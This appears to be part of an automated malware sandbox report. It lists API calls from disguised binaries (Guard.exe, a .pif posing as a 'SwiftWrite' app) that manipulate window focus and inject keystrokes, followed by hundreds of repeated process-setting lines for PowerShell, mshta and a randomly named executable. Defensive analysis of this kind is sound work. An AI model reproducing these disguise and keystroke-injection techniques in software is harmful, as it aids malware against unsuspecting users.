Source: C:\Users\Public\Guard.exe Code function: 23_2_00B65EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,23_2_00B65EDA
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 27_2_008759B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,27_2_008759B3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 27_2_00805EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,27_2_00805EDA
Source: C:\Users\Public\Guard.exe Code function: 23_2_00B733B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,23_2_00B733B7
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\XKIZdXAs.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
